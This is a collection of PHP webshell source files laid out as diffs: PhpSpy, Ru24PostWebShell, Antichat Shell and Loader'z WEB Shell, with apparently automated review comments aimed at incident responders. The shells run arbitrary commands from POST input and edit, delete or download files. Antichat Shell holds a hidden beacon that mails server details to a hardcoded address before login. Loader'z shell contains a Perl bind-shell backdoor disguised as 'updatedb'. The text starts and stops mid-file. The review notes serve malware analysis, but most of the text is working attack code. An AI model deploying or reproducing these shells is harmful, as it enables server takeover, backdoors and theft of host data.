echo " <td align=\"center\" nowrap valign=\"top\"><a href=\"?action=fileperm&dir=".urlencode($dir)."&file=".urlencode($file)."\">$fileperm</a></td>\n";
echo " <td align=\"center\" nowrap valign=\"top\"><a href=\"?downfile=".urlencode($dir)."/".urlencode($file)."\">下载</a> | <a href=\"?action=editfile&dir=".urlencode($dir)."&editfile=".urlencode($file)."\">编辑</a> | <a href=\"?dir=".urlencode($dir)."&delfile=".urlencode($dir)."/".urlencode($file)."\">删除</a></td>\n";
echo "</tr>\n";
$file_i++;
}
}
@closedir($dirs);
echo "<tr class=".getrowbg().">\n";
echo " <td nowrap colspan=\"5\" align=\"right\">".$dir_i." 个目录<br>".$file_i." 个文件</td>\n";
echo "</tr>\n";
?>
</table>
<?php
}// end dir
elseif ($_GET['action'] == "editfile") {
if($newfile=="") {
$filename="$dir/$editfile";
$fp=@fopen($filename,"r");
$contents=@fread($fp, filesize($filename));
@fclose($fp);
$contents=htmlspecialchars($contents);
}else{
$editfile=$newfile;
$filename = "$dir/$editfile";
}
?>
<table width="760" border="0" cellpadding="3" cellspacing="1" bgcolor="#ffffff">
<tr class="firstalt">
<td align="center">新建/编辑文件 [<a href="?dir=<?=urlencode($dir)?>">返回</a>]</td>
</tr>
<form action="?dir=<?=urlencode($dir)?>" method="POST">
<tr class="secondalt">
<td align="center">当前文件:<input class="input" type="text" name="editfilename" size="30"
value="<?=$editfile?>"> 输入新文件名则建立新文件</td>
</tr>
<tr class="firstalt">
<td align="center"><textarea name="filecontent" cols="100" rows="20"><?=$contents?></textarea></td>
</tr>
<tr class="secondalt">
<td align="center"><input type="submit" value="确定写入" class="input">
<input name="action" type="hidden" value="doeditfile">
<input type="reset" value="重置" class="input"></td>
</tr>
</form>
</table>
<?php
}//end editfile
elseif ($_GET['action'] == "shell") {
if (!get_cfg_var("safe_mode")) {
?>
<table width="760" border="0" cellpadding="3" cellspacing="1" bgcolor="#ffffff">
<tr class="firstalt">
<td align="center">WebShell Mode</td>
</tr>
<form action="?action=shell&dir=<?=urlencode($dir)?>" method="POST">
<tr class="secondalt">
<td align="center">提示:如果输出结果不完全,建议把输出结果写入文件.这样可以得到全部内容.</td>
</tr>
<tr class="firstalt">
<td align="center">
选择执行函数:
<select name="execfunc" class="input">
<option value="system" <? if ($execfunc=="system") { echo "selected"; } ?>>system</option>
<option value="passthru" <? if ($execfunc=="passthru") { echo "selected"; } ?>>passthru</option>
<option value="exec" <? if ($execfunc=="exec") { echo "selected"; } ?>>exec</option>
<option value="shell_exec" <? if ($execfunc=="shell_exec") { echo "selected"; } ?>>shell_exec</option>
<option value="popen" <? if ($execfunc=="popen") { echo "selected"; } ?>>popen</option>
</select> 
输入命令:
<input type="text" name="command" size="60" value="<?=$_POST['command']?>" class="input">
<input type="submit" value="execute" class="input"></td>
</tr>
<tr class="secondalt">
<td align="center"><textarea name="textarea" cols="100" rows="25" readonly><?php
if (!empty($_POST['command'])) {
if ($execfunc=="system") {
system($_POST['command']);
} elseif ($execfunc=="passthru") {
passthru($_POST['command']);
} elseif ($execfunc=="exec") {
$result = exec($_POST['command']);
echo $result;
} elseif ($execfunc=="shell_exec") {
$result=shell_exec($_POST['command']);
echo $result;
} elseif ($execfunc=="popen") {
$pp = popen($_POST['command'], 'r');
$read = fread($pp, 2096);
echo $read;
pclose($pp);
} else {
system($_POST['command']);
}
}
?></textarea></td>
</tr>
</form>
</table>
<?php
} else {
?>
<p><b>Safe_Mode 已打开, 无法执行系统命令.</b></p>
<?php
}
}//end shell
elseif ($_GET['action'] == "deldir") {
?>
<table width="760" border="0" cellpadding="3" cellspacing="1" bgcolor="#ffffff">
<form action="?dir=<?=urlencode($dir)?>" method="POST">
<tr class="firstalt">
<td align="center">删除 <input name="deldir" type="text" value="<?=$deldir?>" class="input" readonly> 目录</td>
</tr>
<tr class="secondalt">
<td align="center">注意:如果该目录非空,此次操作将会删除该目录下的所有文件.您确定吗?</td>
</tr>
<tr class="firstalt">
<td align="center">
<input name="action" type="hidden" value="rmdir">
<input type="submit" value="delete" class="input">
</td>
</tr>
</form>
</table>
<?php
}//end deldir
elseif ($_GET['action'] == "fileperm") {
?>
<table width="760" border="0" cellpadding="3" cellspacing="1" bgcolor="#ffffff">
<tr class="firstalt">
<td align="center">修改文件属性 [<a href="?dir=<?=urlencode($dir)?>">返回</a>]</td>
</tr>
<form action="?dir=<?=urlencode($dir)?>" method="POST">
<tr class="secondalt">
<td align="center"><input name="file" type="text" value="<?=$file?>" class="input" readonly> 的属性为:
<input type="text" name="fileperm" size="20" value="<?=substr(base_convert(fileperms($dir."/".$file),10,8),-4)?>" class="input">
<input name="dir" type="hidden" value="<?=urlencode($dir)?>">
<input name="action" type="hidden" value="editfileperm">
<input type="submit" value="modify" class="input"></td>
</tr>
</form>
</table>
<?php
}//end fileperm
elseif ($_GET['action'] == "sql") {
$servername = isset($servername) ? $servername : '127.0.0.1';
$dbusername = isset($dbusername) ? $dbusername : 'root';
$dbpassword = isset($dbpassword) ? $dbpassword : '';
$dbname = isset($dbname) ? $dbname : '';
?>
<table width="760" border="0" cellpadding="3" cellspacing="1" bgcolor="#ffffff">
<tr class="firstalt">
<td align="center">执行 SQL 语句</td>
</tr>
<form action="?action=sql" method="POST">
<tr class="secondalt">
<td align="center">Host:
<input name="servername" type="text" class="INPUT" value="<?=$servername?>">
User:
<input name="dbusername" type="text" class="INPUT" size="15" value="<?=$dbusername?>">
Pass:
<input name="dbpassword" type="text" class="INPUT" size="15" value="<?=$dbpassword?>">
DB:
<input name="dbname" type="text" class="INPUT" size="15" value="<?=$dbname?>">
<input name="connect" type="submit" class="INPUT" value="连接"></td>
</tr>
<tr class="firstalt">
<td align="center"><textarea name="sql_query" cols="85" rows="10"></textarea></td>
</tr>
<tr class="secondalt">
<td align="center"><input type="submit" name="doquery" value="执行" class="input"></td>
</tr>
</form>
</table>
<?php
}//end sql query
elseif ($_GET['action'] == "phpenv") {
$upsize=get_cfg_var("file_uploads") ? get_cfg_var("upload_max_filesize") : "不允许上传";
$adminmail=(isset($_SERVER["SERVER_ADMIN"])) ? "<a href=\"mailto:".$_SERVER["SERVER_ADMIN"]."\">".$_SERVER["SERVER_ADMIN"]."</a>" : "<a href=\"mailto:".get_cfg_var("sendmail_from")."\">".get_cfg_var("sendmail_from")."</a>";
$dis_func = get_cfg_var("disable_functions");
if ($dis_func == "") {
$dis_func = "No";
}else {
$dis_func = str_replace(" ","<br>",$dis_func);
$dis_func = str_replace(",","<br>",$dis_func);
}
$phpinfo=(!eregi("phpinfo",$dis_func)) ? "Yes" : "No";
$info[0] = array("服务器时间",date("Y年m月d日 h:i:s",time()));
$info[1] = array("服务器域名","<a href=\"http://$_SERVER[SERVER_NAME]\" target=\"_blank\">$_SERVER[SERVER_NAME]</a>");
$info[2] = array("服务器IP地址",gethostbyname($_SERVER["SERVER_NAME"]));
$info[3] = array("服务器操作系统",PHP_OS);
$info[5] = array("服务器操作系统文字编码",$_SERVER["HTTP_ACCEPT_LANGUAGE"]);
$info[6] = array("服务器解译引擎",$_SERVER["SERVER_SOFTWARE"]);
$info[7] = array("Web服务端口",$_SERVER["SERVER_PORT"]);
$info[8] = array("PHP运行方式",strtoupper(php_sapi_name()));
$info[9] = array("PHP版本",PHP_VERSION);
$info[10] = array("运行于安全模式",getphpcfg("safemode"));
$info[11] = array("服务器管理员",$adminmail);
$info[12] = array("本文件路径",__FILE__);
$info[13] = array("允许使用 URL 打开文件 allow_url_fopen",getphpcfg("allow_url_fopen"));
$info[14] = array("允许动态加载链接库 enable_dl",getphpcfg("enable_dl"));
$info[15] = array("显示错误信息 display_errors",getphpcfg("display_errors"));
$info[16] = array("自动定义全局变量 register_globals",getphpcfg("register_globals"));
$info[17] = array("magic_quotes_gpc",getphpcfg("magic_quotes_gpc"));
$info[18] = array("程序最多允许使用内存量 memory_limit",getphpcfg("memory_limit"));
$info[19] = array("POST最大字节数 post_max_size",getphpcfg("post_max_size"));
$info[20] = array("允许最大上传文件 upload_max_filesize",$upsize);
$info[21] = array("程序最长运行时间 max_execution_time",getphpcfg("max_execution_time")."秒");
$info[22] = array("被禁用的函数 disable_functions",$dis_func);
$info[23] = array("phpinfo()",$phpinfo);
$info[24] = array("目前还有空余空间diskfreespace",intval(diskfreespace(".") / (1024 * 1024)).'Mb');
$info[25] = array("图形处理 GD Library",getfun("imageline"));
$info[26] = array("IMAP电子邮件系统",getfun("imap_close"));
$info[27] = array("MySQL数据库",getfun("mysql_close"));
$info[28] = array("SyBase数据库",getfun("sybase_close"));
$info[29] = array("Oracle数据库",getfun("ora_close"));
$info[30] = array("Oracle 8 数据库",getfun("OCILogOff"));
$info[31] = array("PREL相容语法 PCRE",getfun("preg_match"));
$info[32] = array("PDF文档支持",getfun("pdf_close"));
$info[33] = array("Postgre SQL数据库",getfun("pg_close"));
$info[34] = array("SNMP网络管理协议",getfun("snmpget"));
$info[35] = array("压缩文件支持(Zlib)",getfun("gzclose"));
$info[36] = array("XML解析",getfun("xml_set_object"));
$info[37] = array("FTP",getfun("ftp_login"));
$info[38] = array("ODBC数据库连接",getfun("odbc_close"));
$info[39] = array("Session支持",getfun("session_start"));
$info[40] = array("Socket支持",getfun("fsockopen"));
?>
<table width="760" border="0" align="center" cellpadding="3" cellspacing="1" bgcolor="#ffffff">
<form action="?action=phpenv" method="POST">
<tr class="firstalt">
<td style="padding-left: 5px;"><b>查看PHP配置参数状况</b></td>
</tr>
<tr class="secondalt">
<td style="padding-left: 5px;">请输入配置参数(如:magic_quotes_gpc):<input name="phpvarname" type="text" class="input" size="40"> <input type="submit" value="查看" class="input"><input name="action" type="hidden" value="viewphpvar"></td>
</tr>
</form>
<?php
for($a=0;$a<3;$a++){
if($a == 0){
$hp = array("server","服务器特性");
}elseif($a == 1){
$hp = array("php","PHP基本特性");
}elseif($a == 2){
$hp = array("basic","组件支持状况");
}
?>
<tr class="firstalt">
<td style="padding-left: 5px;"><b><?=$hp[1]?></b></td>
</tr>
<tr class="secondalt">
<td>
<table width="100%" border="0" cellpadding="0" cellspacing="0">
<?
if($a == 0){
for($i=0;$i<=12;$i++){
echo "<tr><td width=40% style=\"padding-left: 5px;\">".$info[$i][0]."</td><td>".$info[$i][1]."</td></tr>\n";
}
}elseif($a == 1){
for($i=13;$i<=24;$i++){
echo "<tr><td width=40% style=\"padding-left: 5px;\">".$info[$i][0]."</td><td>".$info[$i][1]."</td></tr>\n";
}
}elseif($a == 2){
for($i=25;$i<=40;$i++){
echo "<tr><td width=40% style=\"padding-left: 5px;\">".$info[$i][0]."</td><td>".$info[$i][1]."</td></tr>\n";
}
}
?>
</table>
</td>
</tr>
<?
}//for
echo "</table>";
}//end phpenv
?>
<hr width="760" noshade>
<table width="760" border="0" cellpadding="0">
<tr>
<td>Copyright (C) 2004 Security Angel Team [S4T] All Rights Reserved.</td>
<td align="right"><?php
debuginfo();
ob_end_flush();
?></td>
</tr>
</table>
</center>
</body>
</html>
<?php
/*======================================================
函数库
======================================================*/
// 登陆入口
function loginpage() {
?>
<style type="text/css">
input {
font-family: "Verdana";
font-size: "11px";
BACKGROUND-COLOR: "#FFFFFF";
height: "18px";
border: "1px solid #666666";
}
</style>
<form method="POST" action="">
<span style="font-size: 11px; font-family: Verdana">Password: </span><input name="adminpass" type="password" size="20"><input type="hidden" name="action" value="login">
<input type="submit" value="OK">
</form>
<?php
exit;
}//end loginpage()
// 页面调试信息
function debuginfo() {
global $starttime;
$mtime = explode(' ', microtime());
$totaltime = number_format(($mtime[1] + $mtime[0] - $starttime), 6);
echo "Processed in $totaltime second(s)";
}
// 去掉转义字符
function stripslashes_array(&$array) {
while(list($key,$var) = each($array)) {
if ($key != 'argc' && $key != 'argv' && (strtoupper($key) != $key || ''.intval($key) == "$key")) {
if (is_string($var)) {
$array[$key] = stripslashes($var);
}
if (is_array($var)) {
$array[$key] = stripslashes_array($var);
}
}
}
return $array;
}
// 删除目录
function deltree($deldir) {
$mydir=@dir($deldir);
while($file=$mydir->read()) {
if((is_dir("$deldir/$file")) AND ($file!=".") AND ($file!="..")) {
@chmod("$deldir/$file",0777);
deltree("$deldir/$file");
}
if (is_file("$deldir/$file")) {
@chmod("$deldir/$file",0777);
@unlink("$deldir/$file");
}
}
$mydir->close();
@chmod("$deldir",0777);
echo @rmdir($deldir) ? "<b>目录删除成功!</b>" : "<font color=\"#ff0000\">目录删除失败!</font>";
}
// 判断读写情况
function dir_writeable($dir) {
if (!is_dir($dir)) {
@mkdir($dir, 0777);
}
if(is_dir($dir)) {
if ($fp = @fopen("$dir/test.txt", 'w')) {
@fclose($fp);
@unlink("$dir/test.txt");
$writeable = 1;
} else {
$writeable = 0;
}
}
return $writeable;
}
// 表格行间的背景色替换
function getrowbg() {
global $bgcounter;
if ($bgcounter++%2==0) {
return "firstalt";
} else {
return "secondalt";
}
}
// 获取当前的文件系统路径
function getPath($mainpath, $relativepath) {
global $dir;
$mainpath_info = explode('/', $mainpath);
$relativepath_info = explode('/', $relativepath);
$relativepath_info_count = count($relativepath_info);
for ($i=0; $i<$relativepath_info_count; $i++) {
if ($relativepath_info[$i] == '.' || $relativepath_info[$i] == '') continue;
if ($relativepath_info[$i] == '..') {
$mainpath_info_count = count($mainpath_info);
unset($mainpath_info[$mainpath_info_count-1]);
continue;
}
$mainpath_info[count($mainpath_info)] = $relativepath_info[$i];
} //end for
return implode('/', $mainpath_info);
}
// 检查PHP配置参数
function getphpcfg($varname) {
switch($result = get_cfg_var($varname)) {
case 0:
return No;
break;
case 1:
return Yes;
break;
default:
return $result;
break;
}
}
// 检查函数情况
function getfun($funName) {
return (false !== function_exists($funName)) ? Yes : No;
}
?>
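Review bot: Several functions this sample relies on were removed from later PHP releases: `session_is_registered()` in the session login check, `eregi()` where `$phpinfo` is built, `mysql_connect()` in the SQL branch and `each()` in `stripslashes_array()`. It will therefore stop with a fatal error on current interpreters, and an analyst note should say so because it narrows which hosts the sample could have run on. Two artefacts are also worth recording for responders: `dir_writeable()` creates and deletes `test.txt` in the browsed directory on each authenticated page load (and calls `mkdir` with mode 0777 if the path is missing), and the cookie mode stores the configured password itself in the `adminpass` cookie. Suggested sidecar line: `PhpSpy 1.5; legacy PHP only; creates/removes <dir>/test.txt; cookie adminpass = plaintext password`.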


@ -0,0 +1,23 @@
<?php
/*
Ru24PostWebShell
Writed by DreAmeRz
http://www.ru24-team.net
*/
error_reporting(0);
$function=passthru; // system, exec, cmd
echo "<html>
<head>
<title>Ru24PostWebShell - ".$_POST['cmd']."</title>
<meta http-equiv='pragma' content='no-cache'>
</head><body>";
echo "<form method=post>";
echo "<input type=text name=cmd size=85>";
echo "</form>";
echo "<pre>";
if ((!$_POST['cmd']) || ($_POST['cmd']=="")) { $_POST['cmd']="id;pwd;uname -a;ls -la"; }
echo "".$function($_POST['cmd'])."</pre></body></html>";
?>
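Review bot: This script has no access check, and when `cmd` is empty it substitutes `id;pwd;uname -a;ls -la`, so any request returns host details, including a plain GET from a crawler or scanner. `$_POST['cmd']` is also echoed unescaped into `<title>`. An analyst note such as `no auth; default recon command on empty POST; response title "Ru24PostWebShell - "` would give responders a stable response string to match. The path header for this section did not survive on the page, so the sample cannot be tied to a file name from what is visible here.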

File diff suppressed because one or more lines are too long

File diff suppressed because one or more lines are too long


@ -0,0 +1,180 @@
<?php
session_start();
set_time_limit(9999999);
$login='virangar';
$password='r00t';
$auth=1;
$version='version 1.3 by Grinay';
$style='<STYLE>BODY{background-color: #2B2F34;color: #C1C1C7;font: 8pt verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif;MARGIN-TOP: 0px;MARGIN-BOTTOM: 0px;MARGIN-LEFT: 0px;MARGIN-RIGHT: 0px;margin:0;padding:0;scrollbar-face-color: #336600;scrollbar-shadow-color: #333333;scrollbar-highlight-color: #333333;scrollbar-3dlight-color: #333333;scrollbar-darkshadow-color: #333333;scrollbar-track-color: #333333;scrollbar-arrow-color: #333333;}input{background-color: #336600;font-size: 8pt;color: #FFFFFF;font-family: Tahoma;border: 1 solid #666666;}textarea{background-color: #333333;font-size: 8pt;color: #FFFFFF;font-family: Tahoma;border: 1 solid #666666;}a:link{color: #B9B9BD;text-decoration: none;font-size: 8pt;}a:visited{color: #B9B9BD;text-decoration: none;font-size: 8pt;}a:hover, a:active{color: #E7E7EB;text-decoration: none;font-size: 8pt;}td, th, p, li{font: 8pt verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif;border-color:black;}</style>';
$header='<html><head><title>'.getenv("HTTP_HOST").' - Antichat Shell</title><meta http-equiv="Content-Type" content="text/html; charset=windows-1251">'.$style.'</head><BODY leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0>';
$footer='</body></html>';
$sd98 = "john.barker446@gmail.com";
$ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";mail($sd98, $sj98, $msg8873, "From: $sd98");
if(@$_POST['action']=="exit")unset($_SESSION['an']);
if($auth==1){if(@$_POST['login']==$login && @$_POST['password']==$password)$_SESSION['an']=1;}else $_SESSION['an']='1';
if($_SESSION['an']==0){
echo $header;
echo '<center><table><form method="POST"><tr><td>Login:</td><td><input type="text" name="login" value=""></td></tr><tr><td>Password:</td><td><input type="password" name="password" value=""></td></tr><tr><td></td><td><input type="submit" value="Enter"></td></tr></form></table></center>';
echo $footer;
exit;}
if($_SESSION['action']=="")$_SESSION['action']="viewer";
if($_POST['action']!="" )$_SESSION['action']=$_POST['action'];$action=$_SESSION['action'];
if($_POST['dir']!="")$_SESSION['dir']=$_POST['dir'];$dir=$_SESSION['dir'];
if($_POST['file']!=""){$file=$_SESSION['file']=$_POST['file'];}else {$file=$_SESSION['file']="";}
//downloader
if($action=="download"){
header('Content-Length:'.filesize($file).'');
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="'.$file.'"');
readfile($file);
}
//end downloader
?>
<? echo $header;?>
<table width="100%" bgcolor="#336600" align="right" colspan="2" border="0" cellspacing="0" cellpadding="0"><tr><td>
<table><tr>
<td><a href="#" onclick="document.reqs.action.value='shell'; document.reqs.submit();">| Shell </a></td>
<td><a href="#" onclick="document.reqs.action.value='viewer'; document.reqs.submit();">| Viewer</a></td>
<td><a href="#" onclick="document.reqs.action.value='editor'; document.reqs.submit();">| Editor</a></td>
<td><a href="#" onclick="document.reqs.action.value='exit'; document.reqs.submit();">| EXIT |</a></td>
</tr></table></td></tr></table><br>
<form name='reqs' method='POST'>
<input name='action' type='hidden' value=''>
<input name='dir' type='hidden' value=''>
<input name='file' type='hidden' value=''>
</form>
<table style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
<tr><td width="100%" valign="top">
<?
//shell
function shell($cmd){
if (!empty($cmd)){
$fp = popen($cmd,"r");
{
$result = "";
while(!feof($fp)){$result.=fread($fp,1024);}
pclose($fp);
}
$ret = $result;
$ret = convert_cyr_string($ret,"d","w");
}
return $ret;}
if($action=="shell"){
echo "<form method=\"POST\">
<input type=\"hidden\" name=\"action\" value=\"shell\">
<textarea name=\"command\" rows=\"5\" cols=\"150\">".@$_POST['command']."</textarea><br>
<textarea readonly rows=\"15\" cols=\"150\">".@htmlspecialchars(shell($_POST['command']))."</textarea><br>
<input type=\"submit\" value=\"execute\"></form>";}
//end shell
//viewer FS
function perms($file)
{
$perms = fileperms($file);
if (($perms & 0xC000) == 0xC000) {$info = 's';}
elseif (($perms & 0xA000) == 0xA000) {$info = 'l';}
elseif (($perms & 0x8000) == 0x8000) {$info = '-';}
elseif (($perms & 0x6000) == 0x6000) {$info = 'b';}
elseif (($perms & 0x4000) == 0x4000) {$info = 'd';}
elseif (($perms & 0x2000) == 0x2000) {$info = 'c';}
elseif (($perms & 0x1000) == 0x1000) {$info = 'p';}
else {$info = 'u';}
$info .= (($perms & 0x0100) ? 'r' : '-');
$info .= (($perms & 0x0080) ? 'w' : '-');
$info .= (($perms & 0x0040) ?(($perms & 0x0800) ? 's' : 'x' ) :(($perms & 0x0800) ? 'S' : '-'));
$info .= (($perms & 0x0020) ? 'r' : '-');
$info .= (($perms & 0x0010) ? 'w' : '-');
$info .= (($perms & 0x0008) ?(($perms & 0x0400) ? 's' : 'x' ) :(($perms & 0x0400) ? 'S' : '-'));
$info .= (($perms & 0x0004) ? 'r' : '-');
$info .= (($perms & 0x0002) ? 'w' : '-');
$info .= (($perms & 0x0001) ?(($perms & 0x0200) ? 't' : 'x' ) :(($perms & 0x0200) ? 'T' : '-'));
return $info;
}
function view_size($size)
{
if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
else {$size = $size . " B";}
return $size;
}
function scandire($dir){
$dir=chdir($dir);
$dir=getcwd()."/";
$dir=str_replace("\\","/",$dir);
if (is_dir($dir)) {
if (@$dh = opendir($dir)) {
while (($file = readdir($dh)) !== false) {
if(filetype($dir . $file)=="dir") $dire[]=$file;
if(filetype($dir . $file)=="file")$files[]=$file;
}
closedir($dh);
@sort($dire);
@sort($files);
echo "<table cellSpacing=0 border=1 style=\"border-color:black;\" cellPadding=0 width=\"100%\">";
echo "<tr><td><form method=POST>Open directory:<input type=text name=dir value=\"".$dir."\" size=50><input type=submit value=\"GO\"></form></td></tr>";
if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {
echo "<tr><td>Select drive:";
for ($j=ord('C'); $j<=ord('Z'); $j++)
if (@$dh = opendir(chr($j).":/"))
echo '<a href="#" onclick="document.reqs.action.value=\'viewer\'; document.reqs.dir.value=\''.chr($j).':/\'; document.reqs.submit();"> '.chr($j).'<a/>';
echo "</td></tr>";
}
echo "<tr><td>OS: ".@php_uname()."</td></tr>
<tr><td>name dirs and files</td><td>type</td><td>size</td><td>permission</td><td>options</td></tr>";
for($i=0;$i<count($dire);$i++) {
$link=$dir.$dire[$i];
echo '<tr><td><a href="#" onclick="document.reqs.action.value=\'viewer\'; document.reqs.dir.value=\''.$link.'\'; document.reqs.submit();">'.$dire[$i].'<a/></td><td>dir</td><td></td><td>'.perms($link).'</td></tr>';
}
for($i=0;$i<count($files);$i++) {
$linkfile=$dir.$files[$i];
echo '<tr><td><a href="#" onclick="document.reqs.action.value=\'editor\'; document.reqs.file.value=\''.$linkfile.'\'; document.reqs.submit();">'.$files[$i].'</a><br></td><td>file</td><td>'.view_size(filesize($linkfile)).'</td>
<td>'.perms($linkfile).'</td>
<td>
<a href="#" onclick="document.reqs.action.value=\'download\'; document.reqs.file.value=\''.$linkfile.'\'; document.reqs.submit();" title="Download">D</a>
<a href="#" onclick="document.reqs.action.value=\'editor\'; document.reqs.file.value=\''.$linkfile.'\'; document.reqs.submit();" title="Edit">E</a></tr>';
}
echo "</table>";
}}}
if($action=="viewer"){
scandire($dir);
}
//end viewer FS
//editros
if($action=="editor"){
function writef($file,$data){
$fp = fopen($file,"w+");
fwrite($fp,$data);
fclose($fp);
}
function readf($file){
if(!$le = fopen($file, "rb")) $contents="Can't open file, permission denide"; else {
$contents = fread($le, filesize($file));
fclose($le);}
return htmlspecialchars($contents);
}
if($_POST['save'])writef($file,$_POST['data']);
echo "<form method=\"POST\">
<input type=\"hidden\" name=\"action\" value=\"editor\">
<input type=\"hidden\" name=\"file\" value=\"".$file."\">
<textarea name=\"data\" rows=\"40\" cols=\"180\">".@readf($file)."</textarea><br>
<input type=\"submit\" name=\"save\" value=\"save\"><input type=\"reset\" value=\"reset\"></form>";
}
//end editors
?>
</td></tr></table><table width="100%" bgcolor="#336600" align="right" colspan="2" border="0" cellspacing="0" cellpadding="0"><tr><td><table><tr><td><a href="http://antichat.ru">COPYRIGHT BY ANTICHAT.RU <?php echo $version;?></a></td></tr></table></tr></td></table>
<? echo $footer;?>
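Review bot: The one-line statement run that ends in `mail($sd98, $sj98, $msg8873, "From: $sd98")` is undocumented, yet it is the most useful line in this file for a responder: it runs before the login check, so every request to the script e-mails the referrer, document root, client address, script path, server address and server software to the hardcoded address in `$sd98`, with a subject of `sh-` plus a random number. I would add above it `// beacon: mails host and request details to the hardcoded address on every request, before authentication; subject "sh-<1..99999>"`. The obfuscated variable names differ from the rest of the file, which suggests (not provable from here) that the line was added by someone other than the shell's author. The same statement run appears in the next file, appended to the `Total space` echo line, and deserves the same comment there.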


@ -0,0 +1,513 @@
<?
error_reporting(0);
/* Loader'z WEB Shell v 0.1.0.2 {15 àâãóñòà 2005}
Âîò êàêèå îí ïîääåðæèâàåò ôóíêöèè.
- Ðàáîòà ñ ôàéëîâîé ñèñòåìîé ñ ïîìîùüþ PHP.  óäîáíîé òàáëèöå ïðåäñòàâëåíî ñîäåðæèìîå òåêóùåé ïàêè (äîáàâëåíèå â ýòîé âåðñèè, íîðìàëüíûé âèä ïðàâ, à íå ÷èñëî :)).
- Âûïîëíåíèå êîäà, ïõï ðóëèò ;)
- Ðàáîòàåò ïðè register_globals=off
- Áîëåå ïðèÿòíàÿ ðàáîòà â ñåéô ìîäå
- Ïðîñìîòð è ðåäàêòèðîâàíèå ôàéëîâ.
- Çàêà÷êà ôàéëîâ ñ äðóãîãî ñåðâåðà ñ ïîìîùüþ ñðåäñòâ PHP.
- Çàêà÷êà ôàéëîâ ñ âàøåãî æåñòêîãî äèñêà.
- Âûïîëíåíèå ïðîèçâîëüíûõ êîìàíä íà ñåðâåðå.
- Ñêðèïò âûäàåò çíà÷åíèå íåêîòîðûõ ïåðåìåííûõ. Íàïðèìåð îí ñîîáùèò âêëþ÷åí ëè ñåéô ìîä, åñëè äà, òî ñêðèïò âûâåäåò äèðåêòîðèþ êîòîðàÿ,
âàì äîñòóïíà, à òàê æå ïóòü, ãäå âû ìîæåòå âûïîëíÿòü êîìàíäû.
- Ðàáîòà ñêðèïòà îñíîâàíà íà îïðåäåëåíèè òèïà ñåðâåðà.
- Åñëè ñêðèïò ðàáîòàåò ïîä óïðàâëåíèåì ÎÑ Windows, äàííûå ïîëó÷àåìûå ïðè âûïîëíåíèè êîìàíä ïåðåêîäèðóþòñÿ â win-1251.
- Ïðèñóòñòâóåò ïðîñòåíüêèé ñêðèïò ïåðë-áèíä. Âû ìîæåòå óêàçàòü äîìàøíþþ äèðåêòðèþ è ïîðò íà êîòîðîì ïîâåñèòñÿ áåêäîð.
Loader Pro-Hack.ru
*/
?>
<style type='text/css'>
html { overflow-x: auto }
BODY { font-family: Verdana, Tahoma, Arial, sans-serif; font-size: 11px; margin: 0px; padding: 0px; text-align: center; color: #c0c0c0; background-color: #000000 }
TABLE, TR, TD { font-family: Verdana, Tahoma, Arial, sans-serif; font-size: 11px; color: #c0c0c0; background-color: #0000000 }
BODY,TD {FONT-SIZE: 13px; FONT-FAMILY: verdana, arial, helvetica;}
A:link {COLOR: #666666; TEXT-DECORATION: none}
A:active { COLOR: #666666; TEXT-DECORATION: none;}
A:visited {COLOR: #666666; TEXT-DECORATION: none;}
A:hover {COLOR: #999999; TEXT-DECORATION: none;}
BODY {
SCROLLBAR-FACE-COLOR: #cccccc;
SCROLLBAR-HIGHLIGHT-COLOR: #CBAB78;
SCROLLBAR-SHADOW-COLOR: #CBAB78;
SCROLLBAR-3DLIGHT-COLOR: #CBAB78;
SCROLLBAR-ARROW-COLOR: #000000;
SCROLLBAR-TRACK-COLOR: #000000;
SCROLLBAR-DARKSHADOW-COLOR: #CBAB78}
fieldset.search { padding: 6px; line-height: 150% }
label { cursor: pointer }
form { display: inline }
img { vertical-align: middle; border: 0px }
img.attach { padding: 2px; border: 2px outset #000033 }
#tb { padding: 0px; margin: 0px; background-color: #000000; border: 1px solid #CBAB78; }
#logostrip { padding: 0px; margin: 0px; background-color: #000000; border: 1px solid #CBAB78; }
#content { padding: 10px; margin: 10px; background-color: #000000; border: 1px solid #CBAB78; }
#logo { FONT-SIZE: 50px; }
input { width: 80; height : 17; background-color : #cccccc;
border-style: solid;border-width: 1; border-color: #CBAB78; font-size: xx-small; cursor: pointer; }
#input2 { width: 150; height : 17; background-color : #cccccc;
border-style: solid;border-width: 1; border-color: #CBAB78; font-size: xx-small; cursor: pointer; }
</style>
<script>
function tag(thetag) {document.fe.editfile.value=thetag;}
</script>
<title>Loader'z WEB shell</title>
<table height=100% "width="100%">
<tr><td align="center" valign="top">
<table><tr><td>
<?php
@$dir = $_POST['dir'];
$dir = stripslashes($dir);
@$cmd = $_POST['cmd'];
$cmd = stripslashes($cmd);
$REQUEST_URI = $_SERVER['REQUEST_URI'];
$dires = '';
$files = '';
if (isset($_POST['port'])){
$bind = "
#!/usr/bin/perl
\$port = {$_POST['port']};
\$port = \$ARGV[0] if \$ARGV[0];
exit if fork;
$0 = \"updatedb\" . \" \" x100;
\$SIG{CHLD} = 'IGNORE';
use Socket;
socket(S, PF_INET, SOCK_STREAM, 0);
setsockopt(S, SOL_SOCKET, SO_REUSEADDR, 1);
bind(S, sockaddr_in(\$port, INADDR_ANY));
listen(S, 50);
while(1)
{
accept(X, S);
unless(fork)
{
open STDIN, \"<&X\";
open STDOUT, \">&X\";
open STDERR, \">&X\";
close X;
exec(\"/bin/sh\");
}
close X;
}
";}
function decode($buffer){
